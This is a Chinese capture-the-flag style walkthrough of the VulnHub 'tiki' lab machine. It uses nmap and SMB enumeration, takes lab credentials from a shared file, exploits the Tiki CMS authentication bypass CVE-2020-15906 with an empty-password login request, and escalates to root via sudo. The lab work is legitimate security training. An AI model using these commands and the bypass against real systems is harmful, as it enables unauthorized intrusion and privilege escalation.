vulnhub靶场之tiki靶机

admin 2025年3月21日01:06:23评论5 views字数 2368阅读7分53秒阅读模式

前言

靶机:tiki靶机,IP地址为192.168.10.8

攻击:kali,IP地址为192.168.10.6

靶机采用virtualbox,攻击机采用VMware虚拟机,都采用桥接网卡模式

文章涉及的靶机及工具,都可以自行访问官网或者项目地址进行获取,或者通过网盘链接下载 https://pan.quark.cn/s/89225ca07839

主机发现

也就是相当于现实环境中去发现确定主机的ip地址,因为这里是靶机环境,所以跳过了从域名到ip地址的过程。

使用arp-scan -l或者netdiscovery -r 192.168.10.1/24

当然也可以使用nmap等工具进行

  1. arp-scan -l
vulnhub靶场之tiki靶机

信息收集

使用nmap扫描目标端口等信息

首先扫描目标的tcp端口的开放情况

  1. nmap -sT --min-rate=1000 192.168.10.8 -p- -oA nmap-tcp
vulnhub靶场之tiki靶机

再扫描udp端口的开放情况

  1. nmap -sU --min-rate=1000 192.168.10.8 --top-ports 20 -oA nmap-udp
vulnhub靶场之tiki靶机

可以看到明确开放的udp端口没有,所以下面对tcp端口进行一个筛选

  1. ports=`grep open nmap-tcp.nmap | awk -F'/' '{print $1}' | paste -sd ','`
vulnhub靶场之tiki靶机

进一步对这些端口进行服务、系统等探测

  1. nmap -sV -O -sC 192.168.10.8 -p $ports --min-rate=1000 -oA detail
vulnhub靶场之tiki靶机
vulnhub靶场之tiki靶机

再使用nmap的漏洞检测脚本对这些端口进行探测

  1. nmap --script=vuln 192.168.10.8 -p $ports -oA vuln
vulnhub靶场之tiki靶机

SMB探测

使用enum4linux枚举用户等信息

  1. enum4linux 192.168.10.8 -a
vulnhub靶场之tiki靶机
vulnhub靶场之tiki靶机

也可以直接使用smbclient探测多少分享

  1. smbclient -L //192.168.10.8 -N
vulnhub靶场之tiki靶机

使用smbclient连接目标的Notes,以无密码连接,发现Mail.txt

  1. smbclient //192.168.10.8/Notes -N

    smb: > prompt    #关闭交互    
    smb: > recurse    #开启递归
    smb: > mget *    #下载所有
vulnhub靶场之tiki靶机

查看这个文件

vulnhub靶场之tiki靶机

从中可以知道,用户名silky和密码51lky571k1

网站信息探测

访问80端口界面,是apache安装后的默认界面

vulnhub靶场之tiki靶机

之前nmap扫描出了一个目录/tiki,不过这里还是使用相关的工具再次进行目录爆破

  1. gobuster dir -u http://192.168.10.8 -w /usr/share/wordlists/dirb/big.txt -b 404 -x php,html,txt,md
vulnhub靶场之tiki靶机

访问robots.txt,可以发现一个目录/tiki

vulnhub靶场之tiki靶机

访问这个目录,可以看到有登录框,结合前面获取的用户名和密码,可能就是CMS的用户名和密码

vulnhub靶场之tiki靶机

先不登录,使用whatweb或浏览器插件wappalyzer查看配置

  1. whatweb http://192.168.10.8/tiki -v
vulnhub靶场之tiki靶机

以用户名silky和密码51lky571k1登录成功

登录后进行网站测试,在列表文件发现一个文章,点击后,发现说是有这些东西

vulnhub靶场之tiki靶机

再点击history进行查看,看到由admin编写的,并且在版本2的查看时,发现具体的cve编号了CVE-2020-15906

vulnhub靶场之tiki靶机

使用浏览器搜索对应的cve编号,可以发现描述

vulnhub靶场之tiki靶机

从这个描述可以得知,目标靶机的CMS版本应该是在21.2之前的

CVE-2020-15906漏洞利用

使用searchsploit搜索适应的漏洞,当然,其实在github上等都要该漏洞的利用

vulnhub靶场之tiki靶机

第二个版本比较符号,就是绕过身份认证,查看这个py脚本

vulnhub靶场之tiki靶机

所以说,就是要多次爆破,也就是多次请求,以错误的admin的密码测试

直到Account requires administrator approval.出现在界面,说明可以以空密码登录admin

这里可以借助这个脚本,或者使用burp等工具爆破都行,不过最后都使用burp抓取数据包然后进行修改,把pass的值改为空即可,大概如下

  1. ticket=GiLYjkmMUPV0sXO6HYzPpkCfi0AFtto9veYSuW2MiBs&user=admin+&pass=+&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n
vulnhub靶场之tiki靶机

当抓取后,修改再转发,这里是为了截图,所以找的burp的代理历史记录。

转发后即可发现以admin的身份登录成功了

vulnhub靶场之tiki靶机

按照之前还是点击查看,发现一个文件名称很是吸引

vulnhub靶场之tiki靶机

点击credentials发现了一组凭据,是silky的。silky:Agy8Y7SPJNXQzqA

vulnhub靶场之tiki靶机

当然这里我也测试了很多功能点,发现了文件上传,但是上传的php文件,无法解析为php文件,而是直接下载,所以这个凭据应该就是ssh连接

  1. ssh silky@192.168.10.8
vulnhub靶场之tiki靶机

提权

这里先说明,对于靶机内的信息收集,我做了省略,因为这里sudo -l可以直接提权了,所以一些步骤就不写了,但是要知道哦。

登录后,对于靶机,我直接搜集SUID权限的文件

  1. find / -perm -4000 -print 2>/dev/null
vulnhub靶场之tiki靶机

发现sudo,尝试sudo -l,也知道用户silky的密码,所以直接就能测试出,发现所有的命令都可以提权。

  1. sudo -l
vulnhub靶场之tiki靶机

直接进行提权

  1. sudo /bin/bash -p
vulnhub靶场之tiki靶机

查看最终flag

  1. cd /root
    cat flag.txt
vulnhub靶场之tiki靶机

总结

该靶机从头到尾的重点就是CVE-2020-15906漏洞,就是tiki的CMS漏洞。构造路线如下:

SMB服务---->网站信息获取---->CVE漏洞利用---->获取ssh凭证---->sduo提权

原文始发于微信公众号(泷羽sec-何生安全):vulnhub靶场之tiki靶机

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月21日01:06:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub靶场之tiki靶机https://cn-sec.com/archives/3861300.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息